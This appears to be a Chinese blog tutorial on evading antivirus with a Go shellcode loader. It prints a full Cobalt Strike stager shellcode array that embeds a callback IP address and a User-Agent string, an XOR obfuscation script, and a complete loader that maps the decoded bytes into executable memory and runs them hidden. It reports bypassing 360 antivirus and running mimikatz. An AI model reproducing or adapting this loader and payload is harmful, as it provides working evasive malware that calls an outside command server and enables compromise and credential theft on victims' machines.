0x00:前言

shellcode 分离混淆免杀已经是一个很古老的话题了,其中有c++加载器、python加载器、golang加载器加载shellcode执行,由于c++不熟所以没想从这里入手,python实验了好几天,各种兼容问题深受其烦,最后不得已选golang

0x01:什么是shellcode

shellcode

在维基百科中这样解释道:在黑客攻击中,shellcode是一小段代码,用于利用软件漏洞作为有效载荷。它之所以被称为“shellcode”,是因为它通常启动一个命令shell,攻击者可以从这个命令shell控制受损的计算机,但是执行类似任务的任何代码都可以被称为shellcode。因为有效载荷(payload)的功能不仅限于生成shell,所以有些人认为shellcode的名称是不够严谨的。然而,试图取代这一术语的努力并没有得到广泛的接受。shellcode通常是用机器码编写的。

​ 翻译成人话就是:shellcode是一段机器码,用于执行某些动作。一般用来执行开启套接字操作。

0x02:环境搭建

golang编译环境:https://golang.google.cn/dl/ 下载windows版本即可

安装完毕后cmd 输入 go,出现以下则说明安装成功

0x03:构造

首先需要获得shellcode

msf或者cs自带的shellcode都可以

我们这里先选用CS的shellcode

将双引号内的shellcode摘出来

将其转换为0x格式

这里如果直接使用加载器加载shellcode会被一些杀软杀掉,所以需要对其进行异或混淆一下,加载器解回原始数据即可

这里使用go或者python异或都可以

这里使用的是go

package main

import "fmt"

const (
    // KEY_1 and KEY_2 are the two XOR keys main applies back-to-back
    // (b ^ KEY_1 ^ KEY_2). XOR is associative, so this is identical to
    // XORing every byte with the single constant 55 ^ 66 = 117 (0x75):
    // a one-byte repeating XOR, which an analyst can undo with the same
    // constant or recover by trying all 256 candidate keys.
    KEY_1 = 55
    KEY_2 = 66
)

func main() {
    shellcode := []byte{0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc8,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x66,0x81,0x78,0x18,0x0b,0x02,0x75,0x72,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x4f,0xff,0xff,0xff,0x5d,0x6a,0x00,0x49,0xbe,0x77,0x69,0x6e,0x69,0x6e,0x65,0x74,0x00,0x41,0x56,0x49,0x89,0xe6,0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x07,0xff,0xd5,0x48,0x31,0xc9,0x48,0x31,0xd2,0x4d,0x31,0xc0,0x4d,0x31,0xc9,0x41,0x50,0x41,0x50,0x41,0xba,0x3a,0x56,0x79,0xa7,0xff,0xd5,0xeb,0x73,0x5a,0x48,0x89,0xc1,0x41,0xb8,0x90,0x1f,0x00,0x00,0x4d,0x31,0xc9,0x41,0x51,0x41,0x51,0x6a,0x03,0x41,0x51,0x41,0x57,0x89,0x9f,0xc6,0xff,0xd5,0xeb,0x59,0x5b,0x48,0x89,0xc1,0x48,0x31,0xd2,0x49,0x89,0xd8,0x4d,0x31,0xc9,0x52,0x68,0x00,0x02,0x40,0x84,0x52,0x52,0x41,0xba,0xeb,0x55,0x2e,0x3b,0xff,0xd5,0x48,0x89,0xc6,0x48,0x83,0xc3,0x50,0x6a,0x0a,0x5f,0x48,0x89,0xf1,0x48,0x89,0xda,0x49,0xc7,0xc0,0xff,0xff,0xff,0xff,0x4d,0x31,0xc9,0x52,0x52,0x41,0xba,0x2d,0x06,0x18,0x7b,0xff,0xd5,0x85,0xc0,0x0f,0x85,0x9d,0x01,0x00,0x00,0x48,0xff,0xcf,0x0f,0x84,0x8c,0x01,0x00,0x00,0xeb,0xd3,0xe9,0xe4,0x01,0x00,0x00,0xe8,0xa2,0xff,0xff,0xff,0x2f,0x35,0x74,0x4b,0x69,0x00,0
x8f,0x16,0x7e,0xca,0x0e,0x8c,0xad,0x7a,0x58,0x83,0x7a,0x8b,0x66,0xaf,0x5c,0xed,0xfc,0xef,0x57,0x42,0xde,0xf1,0xd7,0x3a,0x9f,0xf8,0x0e,0xdc,0x86,0xf1,0xd7,0xf0,0x7f,0x0b,0xfe,0xb6,0x78,0x2c,0x25,0x07,0x39,0x3b,0xa0,0x34,0x0a,0x8d,0x06,0x61,0x11,0x54,0x8c,0x3d,0xea,0x35,0x14,0x3e,0xb2,0x0a,0x5e,0x7f,0x0f,0xe5,0x0e,0x36,0x7a,0x5c,0x19,0xfa,0xa9,0x39,0xf4,0xe8,0xf4,0x00,0x55,0x73,0x65,0x72,0x2d,0x41,0x67,0x65,0x6e,0x74,0x3a,0x20,0x4d,0x6f,0x7a,0x69,0x6c,0x6c,0x61,0x2f,0x35,0x2e,0x30,0x20,0x28,0x63,0x6f,0x6d,0x70,0x61,0x74,0x69,0x62,0x6c,0x65,0x3b,0x20,0x4d,0x53,0x49,0x45,0x20,0x31,0x30,0x2e,0x30,0x3b,0x20,0x57,0x69,0x6e,0x64,0x6f,0x77,0x73,0x20,0x4e,0x54,0x20,0x36,0x2e,0x32,0x3b,0x20,0x57,0x4f,0x57,0x36,0x34,0x3b,0x20,0x54,0x72,0x69,0x64,0x65,0x6e,0x74,0x2f,0x36,0x2e,0x30,0x3b,0x20,0x54,0x6f,0x75,0x63,0x68,0x3b,0x20,0x4d,0x41,0x4c,0x43,0x4a,0x53,0x29,0x0d,0x0a,0x00,0xb7,0x76,0x60,0x7d,0x86,0x2f,0x5c,0x95,0x70,0xf1,0xe7,0x5d,0x58,0x5a,0x0e,0x54,0x58,0x14,0x50,0xcd,0xa0,0x9c,0xd0,0x9e,0xc0,0x11,0x18,0x0a,0xd8,0x52,0xce,0x45,0xc6,0xd0,0xa3,0x09,0x12,0xbf,0x98,0xe7,0x5f,0x8e,0xbd,0xba,0x76,0xf9,0xc5,0xb3,0x1d,0x98,0xfc,0xf9,0x43,0xdd,0xfe,0x8d,0x4f,0x99,0xeb,0x99,0xd4,0xd8,0xd1,0x19,0xfa,0xd7,0x95,0xa6,0x84,0x37,0x05,0x4b,0x8e,0xf8,0x37,0x74,0x80,0xd7,0x2b,0x52,0xf3,0x23,0x2e,0xd6,0x40,0xcc,0xfa,0x33,0xbe,0x6a,0xe6,0x0e,0xe5,0xac,0x8f,0x95,0xc3,0x90,0x4e,0x43,0x8d,0x34,0x68,0x8f,0x47,0x5a,0x37,0x83,0x95,0x47,0x53,0x6d,0xc2,0xe2,0xa3,0xd0,0xe5,0xc4,0x89,0xa9,0xfb,0xd3,0x11,0x65,0x7e,0x58,0x14,0x33,0xaa,0x37,0x63,0xda,0x54,0x7b,0x61,0x73,0xf4,0xa7,0x9c,0xd0,0xb0,0x17,0xa1,0x4f,0x66,0x9f,0x42,0xa0,0xa1,0x1c,0xe3,0xf5,0x43,0x09,0x58,0x89,0x1c,0x20,0x3a,0x9c,0xb9,0x8b,0x93,0xa1,0x12,0x2c,0x71,0x56,0x8e,0xde,0x69,0x0d,0x7f,0xdc,0x58,0xcc,0x3d,0xbe,0xfc,0xc0,0xfb,0x8d,0x68,0x15,0x6f,0x37,0xf2,0xdd,0x54,0x11,0x6e,0x00,0xb8,0x62,0x7a,0x23,0x06,0x21,0x54,0xfb,0xdb,0x63,0x00,0x41,0xbe,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x48,0x31,0xc9,0xba,0x00,0x00,0x40,0x00,0x41,0xb8,0x00,0x10,0x00,0x00,0
x41,0xb9,0x40,0x00,0x00,0x00,0x41,0xba,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x48,0x93,0x53,0x53,0x48,0x89,0xe7,0x48,0x89,0xf1,0x48,0x89,0xda,0x41,0xb8,0x00,0x20,0x00,0x00,0x49,0x89,0xf9,0x41,0xba,0x12,0x96,0x89,0xe2,0xff,0xd5,0x48,0x83,0xc4,0x20,0x85,0xc0,0x74,0xb6,0x66,0x8b,0x07,0x48,0x01,0xc3,0x85,0xc0,0x75,0xd7,0x58,0x58,0x58,0x48,0x05,0x00,0x00,0x00,0x00,0x50,0xc3,0xe8,0x9f,0xfd,0xff,0xff,0x31,0x32,0x39,0x2e,0x32,0x31,0x31,0x2e,0x38,0x33,0x2e,0x35,0x31,0x00,0x6f,0xaa,0x51,0xc3}
    fmt.Print("{")
    for i := 0; i < len(shellcode); i++ {
        fmt.Print(shellcode[i]^KEY_1^KEY_2, ",")
    }
    fmt.Print("}")
}

然后将混淆后的值改为hex值

填入shellcode至数组 该文件为标准golang shellcode 加载器

package main

import (
    "syscall"
    "unsafe"
)

const (
    // Win32 VirtualAlloc arguments used by main: the region is reserved
    // and committed in one call (MEM_COMMIT|MEM_RESERVE) and mapped with
    // PAGE_EXECUTE_READWRITE, i.e. readable, writable and executable at
    // once. NOTE(review): a private RWX allocation that is written to and
    // then jumped into is one of the most widely monitored patterns in
    // endpoint telemetry, independent of how the payload bytes are encoded.
    MEM_COMMIT             = 0x1000
    MEM_RESERVE            = 0x2000
    PAGE_EXECUTE_READWRITE = 0x40
    // XOR keys; main applies both in sequence (b ^ KEY_1 ^ KEY_2), which
    // collapses to a single-byte XOR with 55 ^ 66 = 117 (0x75).
    KEY_1                  = 55
    KEY_2                  = 66
)

var (
    // Resolved during package initialization, before main runs. The
    // Must* variants panic if the DLL or the export cannot be found, so
    // the process aborts at startup rather than in main. The DLL names
    // are relative; the syscall package documents that LoadDLL without
    // an absolute path is subject to DLL preloading, although kernel32
    // and ntdll are already mapped into every Windows process.
    kernel32      = syscall.MustLoadDLL("kernel32.dll")
    ntdll         = syscall.MustLoadDLL("ntdll.dll")
    // kernel32!VirtualAlloc: main uses it to obtain the RWX region.
    VirtualAlloc  = kernel32.MustFindProc("VirtualAlloc")
    // ntdll!RtlCopyMemory: main uses it to copy the decoded bytes into
    // that region before transferring control to it.
    RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory")
)

func main() {
    xor_shellcode := []byte{0x89,0x3d,0xf6,0x91,0x85,0x9d,0xbd,0x75,0x75,0x75,0x34,0x24,0x34,0x25,0x27,0x24,0x23,0x3d,0x44,0xa7,0x10,0x3d,0xfe,0x27,0x15,0x3d,0xfe,0x27,0x6d,0x3d,0xfe,0x27,0x55,0x3d,0xfe,0x7,0x25,0x3d,0x7a,0xc2,0x3f,0x3f,0x38,0x44,0xbc,0x3d,0x44,0xb5,0xd9,0x49,0x14,0x9,0x77,0x59,0x55,0x34,0xb4,0xbc,0x78,0x34,0x74,0xb4,0x97,0x98,0x27,0x34,0x24,0x3d,0xfe,0x27,0x55,0xfe,0x37,0x49,0x3d,0x74,0xa5,0x13,0xf4,0xd,0x6d,0x7e,0x77,0x0,0x7,0xfe,0xf5,0xfd,0x75,0x75,0x75,0x3d,0xf0,0xb5,0x1,0x12,0x3d,0x74,0xa5,0x25,0xfe,0x3d,0x6d,0x31,0xfe,0x35,0x55,0x3c,0x74,0xa5,0x96,0x23,0x3d,0x8a,0xbc,0x34,0xfe,0x41,0xfd,0x3d,0x74,0xa3,0x38,0x44,0xbc,0x3d,0x44,0xb5,0xd9,0x34,0xb4,0xbc,0x78,0x34,0x74,0xb4,0x4d,0x95,0x0,0x84,0x39,0x76,0x39,0x51,0x7d,0x30,0x4c,0xa4,0x0,0xad,0x2d,0x31,0xfe,0x35,0x51,0x3c,0x74,0xa5,0x13,0x34,0xfe,0x79,0x3d,0x31,0xfe,0x35,0x69,0x3c,0x74,0xa5,0xfe,0x71,0xfd,0x3d,0x74,0xa5,0x34,0x2d,0x34,0x2d,0x2b,0x2c,0x2f,0x34,0x2d,0x34,0x2c,0x34,0x2f,0x3d,0xf6,0x99,0x55,0x34,0x27,0x8a,0x95,0x2d,0x34,0x2c,0x2f,0x3d,0xfe,0x67,0x9c,0x3a,0x8a,0x8a,0x8a,0x28,0x1f,0x75,0x3c,0xcb,0x2,0x1c,0x1b,0x1c,0x1b,0x10,0x1,0x75,0x34,0x23,0x3c,0xfc,0x93,0x39,0xfc,0x84,0x34,0xcf,0x39,0x2,0x53,0x72,0x8a,0xa0,0x3d,0x44,0xbc,0x3d,0x44,0xa7,0x38,0x44,0xb5,0x38,0x44,0xbc,0x34,0x25,0x34,0x25,0x34,0xcf,0x4f,0x23,0xc,0xd2,0x8a,0xa0,0x9e,0x6,0x2f,0x3d,0xfc,0xb4,0x34,0xcd,0xe5,0x6a,0x75,0x75,0x38,0x44,0xbc,0x34,0x24,0x34,0x24,0x1f,0x76,0x34,0x24,0x34,0xcf,0x22,0xfc,0xea,0xb3,0x8a,0xa0,0x9e,0x2c,0x2e,0x3d,0xfc,0xb4,0x3d,0x44,0xa7,0x3c,0xfc,0xad,0x38,0x44,0xbc,0x27,0x1d,0x75,0x77,0x35,0xf1,0x27,0x27,0x34,0xcf,0x9e,0x20,0x5b,0x4e,0x8a,0xa0,0x3d,0xfc,0xb3,0x3d,0xf6,0xb6,0x25,0x1f,0x7f,0x2a,0x3d,0xfc,0x84,0x3d,0xfc,0xaf,0x3c,0xb2,0xb5,0x8a,0x8a,0x8a,0x8a,0x38,0x44,0xbc,0x27,0x27,0x34,0xcf,0x58,0x73,0x6d,0xe,0x8a,0xa0,0xf0,0xb5,0x7a,0xf0,0xe8,0x74,0x75,0x75,0x3d,0x8a,0xba,0x7a,0xf1,0xf9,0x74,0x75,0x75,0x9e,0xa6,0x9c,0x91,0x74,0x75,0x75,0x9d,0xd7,0x8a,0x8a,0x8a,0x5a,0x40,0x1,0x3e,0x1c,0x75,0xfa,0x63,0x
b,0xbf,0x7b,0xf9,0xd8,0xf,0x2d,0xf6,0xf,0xfe,0x13,0xda,0x29,0x98,0x89,0x9a,0x22,0x37,0xab,0x84,0xa2,0x4f,0xea,0x8d,0x7b,0xa9,0xf3,0x84,0xa2,0x85,0xa,0x7e,0x8b,0xc3,0xd,0x59,0x50,0x72,0x4c,0x4e,0xd5,0x41,0x7f,0xf8,0x73,0x14,0x64,0x21,0xf9,0x48,0x9f,0x40,0x61,0x4b,0xc7,0x7f,0x2b,0xa,0x7a,0x90,0x7b,0x43,0xf,0x29,0x6c,0x8f,0xdc,0x4c,0x81,0x9d,0x81,0x75,0x20,0x6,0x10,0x7,0x58,0x34,0x12,0x10,0x1b,0x1,0x4f,0x55,0x38,0x1a,0xf,0x1c,0x19,0x19,0x14,0x5a,0x40,0x5b,0x45,0x55,0x5d,0x16,0x1a,0x18,0x5,0x14,0x1,0x1c,0x17,0x19,0x10,0x4e,0x55,0x38,0x26,0x3c,0x30,0x55,0x44,0x45,0x5b,0x45,0x4e,0x55,0x22,0x1c,0x1b,0x11,0x1a,0x2,0x6,0x55,0x3b,0x21,0x55,0x43,0x5b,0x47,0x4e,0x55,0x22,0x3a,0x22,0x43,0x41,0x4e,0x55,0x21,0x7,0x1c,0x11,0x10,0x1b,0x1,0x5a,0x43,0x5b,0x45,0x4e,0x55,0x21,0x1a,0x0,0x16,0x1d,0x4e,0x55,0x38,0x34,0x39,0x36,0x3f,0x26,0x5c,0x78,0x7f,0x75,0xc2,0x3,0x15,0x8,0xf3,0x5a,0x29,0xe0,0x5,0x84,0x92,0x28,0x2d,0x2f,0x7b,0x21,0x2d,0x61,0x25,0xb8,0xd5,0xe9,0xa5,0xeb,0xb5,0x64,0x6d,0x7f,0xad,0x27,0xbb,0x30,0xb3,0xa5,0xd6,0x7c,0x67,0xca,0xed,0x92,0x2a,0xfb,0xc8,0xcf,0x3,0x8c,0xb0,0xc6,0x68,0xed,0x89,0x8c,0x36,0xa8,0x8b,0xf8,0x3a,0xec,0x9e,0xec,0xa1,0xad,0xa4,0x6c,0x8f,0xa2,0xe0,0xd3,0xf1,0x42,0x70,0x3e,0xfb,0x8d,0x42,0x1,0xf5,0xa2,0x5e,0x27,0x86,0x56,0x5b,0xa3,0x35,0xb9,0x8f,0x46,0xcb,0x1f,0x93,0x7b,0x90,0xd9,0xfa,0xe0,0xb6,0xe5,0x3b,0x36,0xf8,0x41,0x1d,0xfa,0x32,0x2f,0x42,0xf6,0xe0,0x32,0x26,0x18,0xb7,0x97,0xd6,0xa5,0x90,0xb1,0xfc,0xdc,0x8e,0xa6,0x64,0x10,0xb,0x2d,0x61,0x46,0xdf,0x42,0x16,0xaf,0x21,0xe,0x14,0x6,0x81,0xd2,0xe9,0xa5,0xc5,0x62,0xd4,0x3a,0x13,0xea,0x37,0xd5,0xd4,0x69,0x96,0x80,0x36,0x7c,0x2d,0xfc,0x69,0x55,0x4f,0xe9,0xcc,0xfe,0xe6,0xd4,0x67,0x59,0x4,0x23,0xfb,0xab,0x1c,0x78,0xa,0xa9,0x2d,0xb9,0x48,0xcb,0x89,0xb5,0x8e,0xf8,0x1d,0x60,0x1a,0x42,0x87,0xa8,0x21,0x64,0x1b,0x75,0xcd,0x17,0xf,0x56,0x73,0x54,0x21,0x8e,0xae,0x16,0x75,0x34,0xcb,0x85,0xc0,0xd7,0x23,0x8a,0xa0,0x3d,0x44,0xbc,0xcf,0x75,0x75,0x35,0x75,0x34,0xcd,0x75,0x65,0x75,0x75,0x34,0xcc,0x35,0x75,0x75,0x75,0x34,0xcf,0
x2d,0xd1,0x26,0x90,0x8a,0xa0,0x3d,0xe6,0x26,0x26,0x3d,0xfc,0x92,0x3d,0xfc,0x84,0x3d,0xfc,0xaf,0x34,0xcd,0x75,0x55,0x75,0x75,0x3c,0xfc,0x8c,0x34,0xcf,0x67,0xe3,0xfc,0x97,0x8a,0xa0,0x3d,0xf6,0xb1,0x55,0xf0,0xb5,0x1,0xc3,0x13,0xfe,0x72,0x3d,0x74,0xb6,0xf0,0xb5,0x0,0xa2,0x2d,0x2d,0x2d,0x3d,0x70,0x75,0x75,0x75,0x75,0x25,0xb6,0x9d,0xea,0x88,0x8a,0x8a,0x44,0x47,0x4c,0x5b,0x47,0x44,0x44,0x5b,0x4d,0x46,0x5b,0x40,0x44,0x75,0x1a,0xdf,0x24,0xb6}
    var shellcode []byte
    for i := 0; i < len(xor_shellcode); i++ {
        shellcode = append(shellcode, xor_shellcode[i]^KEY_1^KEY_2)
    }
    addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
    if err != nil && err.Error() != "The operation completed successfully." {
        syscall.Exit(0)
    }
    _, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)))
    if err != nil && err.Error() != "The operation completed successfully." {
        syscall.Exit(0)
    }
    syscall.Syscall(addr, 0, 0, 0, 0)
}

然后编译即可 go build -ldflags "-H=windowsgui" test.go

此命令可使可执行文件后台执行

在靶机(360全家桶)上运行该软件

成功上线

尝试执行命令

文件管理

尝试mimikatz

360一点反应没有

同理 msf也可以 正常上线,同时也可以增加加密复杂程度等等

全球网站杀毒情况 2/55

0x04:参考

https://www.redteaming.top/2019/12/20/%E4%BD%BF%E7%94%A8golang%E5%8A%A0%E8%BD%BD%E5%BC%82%E6%88%96%E7%9A%84shellcode%E5%85%8D%E6%9D%80/
